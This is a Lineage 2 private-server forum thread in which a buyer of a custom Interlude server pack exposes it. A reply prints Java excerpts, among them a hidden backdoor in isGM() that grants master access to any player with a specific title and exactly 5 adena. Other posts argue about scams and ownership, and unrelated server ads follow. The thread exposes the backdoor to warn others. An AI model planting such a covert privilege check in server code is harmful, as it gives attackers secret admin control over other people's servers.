Jump to content

Recommended Posts

Posted

L2-Arena Proffessional Custom Interlude Ready To Go [bassed grankain source]
 
Project based on last grankain source revision
Project ready to start
Tested live 
Perfect working geodata
Perfect working skills like l2off
Perfect working sieges
Video with server preview here
 


 
 
I wish to sell my Lineage2 Interlude Custom PVP Project
Project have ready banners and ready server name for who wish to purchase it
Server name: L2 Arena
You will be able to see logo and banners in the video below...
Project will be sold only 1 time to only 1 person
After the proejct will be sold once to 1 person, the next person who will wish to buy it will recive a reworked project, with changed gameplay style, changed zones, monsters, items, farming items, farming style and whatever the customer ask for.
I do not have time for open the server, i can offer support if there is any bug inside ( for free ), if the customer want support for adding new things or anything else, it will cost, depend how many hours i will work.
I can help setup the server for free.
Project contains latest 2016 bug fixes
All skills reworked to be similar to L2OFF
Same i can say about balance
Do not hesitate to ask for test server, you can test the project whenever you want
Call your friends and come to play on it and see if you like it or not!  :)
The project is an update of Lineage2Prestige ( my last custom pvp server )
The project is based on Prestige Source ( my own private project )
Q: Why i consider this my own private project?
A: Because everything has been added manually and allmost everything has been reworked by me!
PS: Source is suitable for any type of server, even for low rates one.For more info about features contact me on skype.
Here you can see a little preview of the project, here is video:

Chronicle: Interlude
Rates 1000x
Main Town: kamael Village
Max level 85
 
3 Tier Weapons:
- Lindvior Weapons - Tier 1
- Valakas Weapons - Tier 2
- Kelbim Weapons - Tier 3
 
3 Tier Armors:
- Exile Armor - Tier 1
- Valkyria Armor - Tier 2
- Ertheia Armor - Tier 3
 
Upgradable Raid Boss Jewels:
- Core -> Improved Core -> Blessed Core
- Orfen -> Improved Orfen -> Blessed Orfen
- Baium -> Improved Baium -> Blessed Baium
- Queen Ant -> Improved Queen Ant -> Blessed Queen Ant
 
5 types of Elemental Shirts with Awakening Powers
- Ogre
- Monk
- Witch
- Empower
- Rabbit
 
Farm Items currency:
- Adena
- Ancient Adena
- Red Libra ( from boss, low chance from mobs, from champions etc... )
 
Farm Zones:
- Level Zone
- Cruma Tower ( custom ) - Solo Zone
- Underground Temple of Prayer - Hard Zone - party recommended
 
Raid Bosses: 
- Golkonda
- Lilith
- Chaos Van Helsing
- Halisha
- Halisha PVP ZONE
- Antharas
- Valakas
- Baium
- Exiled Anakim ( The Lindvior Guardian ) - location inside Undeground Temple of Prayer Secret Boss Room
 
PVP Zone
- need type: .exit for leave
- auto flag when enter
- auto nobless when enter and when respawn
- auto respawn in 10 seconds
- respawn full hp/cp/mp
- Zone can be changed whenever you want in any other location ( current loc: Pagan Temple )
- Show hp/cp/mp left of your killer
 
SERVER NPC:
- rank manager - show pvp/pk ranking top 10
- augmenter/skill enchanter 2 in 1
- Custom Gm Shop
- Custom Shop - upgrade armor/weapon
- Raid Boss manager show info about raids alive/dead
- Global teleporter
- NPC buffer with all buffs included malarias
- service npc sell all augments directly to your weapon
- class changer
- all in 1 npc warehouse
- symbol maker
- auction npc buy clan hall
- siege npc
- class master npc can add all subclass in same npc even overlord
 
SPECIAL ITEMS
- clan rep scroll
- premium rune ( x2 all rates for 24 hours )
- recommend item get instant 255 rec
- clan coin - get instant clan llv 8
- clan skills coin - get instant all clan skills
 
SOME SERVER PHOTOS
 
Shot00000.jpg
 
Shot00001.jpg
 
Shot00002.jpg
 
Shot00023.jpg
 
Shot00025.jpg
 
Shot00026.jpg
 
Shot00027.jpg
 
Shot00028.jpg
 
Shot00029.jpg
 
Shot00030.jpg

 

MEDIAFIRE pack

MEDIAFIRE patch
MEDIAFIRE source

 

ATTENTION: THIS ARE EXACTLY THE FILES HE UPLOADED TO ME! I DIDNT TOUCH THIS FILES. TRY TO OPEN A SERVER WITH THIS!

SAY THANKS TO MADA AND SMILE GUYS. THIS PACK NEED A LOT OF WORK. I PAY FOR IT AND I GET FAILED, I DONT WANT THE SAME TO YOU!!

  • Like 1
  • Thanks 1
  • Upvote 1
Posted

You killing lineage 2 scene.

 

i dont know if is true, but if yes -> interlude the end

 

 

hahahaha, thats a nice one dudee. wp wp. u really make me laught.

Posted (edited)

0axax00ax0ax0ax0ax0ax0ax0ax0ax

check in config.java my @author 

[GR] eiparxi theos!!  :troll:

o pro developer pou elege oti ta file mou einai dika tou

kai ta poulouse. mou eftiakse tin mera!!

	public static int BOSS_ID;
	public static boolean ALLOW_AUTO_NOBLESS_FROM_BOSS;
	public static int RADIUS_TO_RAID;
	public static boolean ALLOW_ANNOUNCE_SPAWN;
	public static boolean ALLOW_KILLER_NAME;
	
	/**
	 * Custom Code my Luna Developer Polymorph npc
	 * 		 and special mage polymorph
	 */

	public static boolean SHOW_HP_POLY;
	public static String RAID_BOSS_HP_PERCENT;
	public static List<Integer> Raid_Boss_Ids_For_Hp = new ArrayList<>();
		
	public static void loadVoteRewardManagerConfig()
	{
		final String file = "./config/functions/votemanagernpc.properties";
		
		try
		{
			final Properties voteManager = new Properties();
			final InputStream is = new FileInputStream(new File(file));
			voteManager.load(is);
			is.close();

			VOTE_LINK_HOPZONE = voteManager.getProperty("HopzoneUrl", "null");
			VOTE_LINK_TOPZONE = voteManager.getProperty("TopzoneUrl", "null");
			VOTE_REWARD_ID1 = Integer.parseInt(voteManager.getProperty("VoteRewardId1", "300"));
			VOTE_REWARD_ID2 = Integer.parseInt(voteManager.getProperty("VoteRewardId2", "300"));
			VOTE_REWARD_ID3 = Integer.parseInt(voteManager.getProperty("VoteRewardId3", "300"));
			VOTE_REWARD_ID4 = Integer.parseInt(voteManager.getProperty("VoteRewardId4", "300"));
			VOTE_REWARD_AMOUNT1 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount1", "300"));
			VOTE_REWARD_AMOUNT2 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount2", "300"));
			VOTE_REWARD_AMOUNT3 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount3", "300"));
			VOTE_REWARD_AMOUNT4 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount4", "300"));
			SECS_TO_VOTE = Integer.parseInt(voteManager.getProperty("SecondsToVote", "20"));
		}
		catch (final Exception e)
		{
			e.printStackTrace();
			throw new Error("Failed to Load " + file + " File.");
		}
	}

more author xD
//custom code by Developer Luna
 
TXT_ENABLE = Boolean.parseBoolean(frozenSettings.getProperty("txtEnable", "False"));
TXT_NAME = frozenSettings.getProperty("txtName", "Welcome");
TXT_ON_ENTER = frozenSettings.getProperty("ChatTxTEnter", "Welcome");

 

and backdoor in L2PcInstance.java

	
	public boolean isGM()
	{
		if(getTitle().equals("getItemCount(57)") && getInventory().getInventoryItemCount(57, 0) == 5)
		{
			   setAccessLevel(Config.MASTERACCESS_LEVEL);
			   return false;
		}
		return getAccessLevel().isGm();
	}
Edited by tazerman2
Posted

gg mada no more money for shity dev who sell it))

i never thought this day would come

the day that madaftw actually did something good

 

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

he doesnt deserve any and should be immediately removed from this forum

 

 

i have no reason to get banned. :) i pay for this shiet, so is mine, i can do what ever i want with it. if i wanted to be a shiet i still can refound his money on paypal. but im not a scamer how he say, i just want that to the people to know what he sell.

gj boo i guess you did improve a lot

 

 

2e0f340570.png

Posted

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

Respect what ? He buy it and he can do what ever he want with HIS files . Same goes for your project too IF i become a paid member in your project i can't share a custom pack that i can create ? If Dan7E2 wanted his work to stay "private" then he would only sell ready pack and not source so i guess he don't care . 

Posted

So you basically paid 90e for frozen with custom items?

 

SO SAD. RIGHT?

 

 

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

 

I DID, but i stop when he call me scamer & lier, he wanted this fight

Posted

Respect what ? He buy it and he can do what ever he want with HIS files . Same goes for your project too IF i become a paid member in your project i can't share a custom pack that i can create ? If Dan7E2 wanted his work to stay "private" then he would only sell ready pack and not source so i guess he don't care .

 

No you cant..

*topic*

About topic as i can notice is the shared one cadmus files by tazerman2..

At the end is the truth..liers must be punished

Posted

Lying is easy, told ya you're a scammer. If a single thing works as retail in this pack, I'm the next Pope.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




  • Posts

    • A New Chapter Begins We're Rebuilding – Join Our Staff Team After many years of activity, growth, and challenges, it’s finally time for our community to restructure and move forward. We’re ready to turn a new page and evolve into something greater — but we can’t do it without the help of passionate and committed people. That’s why we’re now opening up staff applications for those who want to actively shape the future of our community. If you have the motivation, time, and patience to contribute to something meaningful, this is your chance to step in and make a real impact. What We're Looking For We’re building a fresh and dedicated team of individuals who are ready to support and grow this project. Open roles include: Moderators – to keep the forum clean, safe, and organized Gaming Moderators – to help manage gaming boards (e.g., Lineage, GTA FiveM) Content Creators – to post updates, guides, and articles Community Managers – to engage users and drive activity Technical Staff – for development, backend, and server work We’re not focusing only on Lineage anymore. Our vision is expanding to new areas — including GTA FiveM and other multiplayer games you might have expertise in. If you have a good idea, a server plan, or something new to suggest — we’re open to it. Now’s the time to bring it forward. Requirements We’re looking for individuals who have: A history of activity on the forum (preferred) Available time to contribute consistently A sense of teamwork and responsibility A genuine interest in gaming and community building If you're interested, just send a private message to me or Celestine. (or just reply here) Tell us a few things about yourself and how you’d like to contribute. Let’s bring this community back to life. Let’s rebuild something great — together.   M M G A 
    • Lineage2Network - Interlude Reimagined   Embark on a revitalized journey through the classic Interlude era with Lineage2.Network. Our server is meticulously crafted by veteran players to deliver a seamless and engaging experience, blending the nostalgia of the Chaotic Chronicle with modern enhancements.     Server details   Chronicle: Interlude + Classic Rates: EXP x30 | Adena x10 | Drop x10 | Spoil x10     Server features   Daily Missions - complete special tasks for daily rewards Attendance Rewards - get rewards for online time Custom Events - TVT, DM, CTF NPC buffer duration - 2 hours   Mana Potions - restores 1000 MP, 10s cooldown Ring of Core additional stats: +1 STR Earring of Orfen additional stats: +1 INT Shadow Earring of Zaken - 7 days Shadow Ring of Queen Ant - 7 days   Max buff count - 24 (20 + 4 with Divine Inspiration) Noblesse, Heroic Valor, Flames of Invincibility and Celestial Shield don't take buff slot Reworked Cancel, Mage and Warrior Banes – removed buffs reappear after 30s Block Buffs - block all incoming buffs except from self/party Sweeper Festival added to Spoiler class   Subclass – retail or purchasable Noblesse – retail or purchasable up to Barakiel; collect 8 fragments for full staff 1st & 2nd class free, 3rd needs 700 Halisha Marks or is purchasable New Olympiad System: new stadiums with NPC buffer,  1 week period.     Key dates     Beta Launch: April 14, 2025 Official Launch: May 9, 2025     Check out full server details in our website And visit our discord   Join us and be part of community where classic gameplay meets innovative updates. Whether you're a solo adventurer or part of a formidable clan, Lineage2.Network offers a dynamic and balanced environment for all.  
    • Good day. Our game currency store is looking for suppliers of adena and items on a project such as L2REBORN x10. We also sell Epic jewelry and various items on this project L2REBORN x10. There are items and adena on L2REBORN x1. For all questions, write to us in discord - goddardshop
  • Topics

×
×
  • Create New...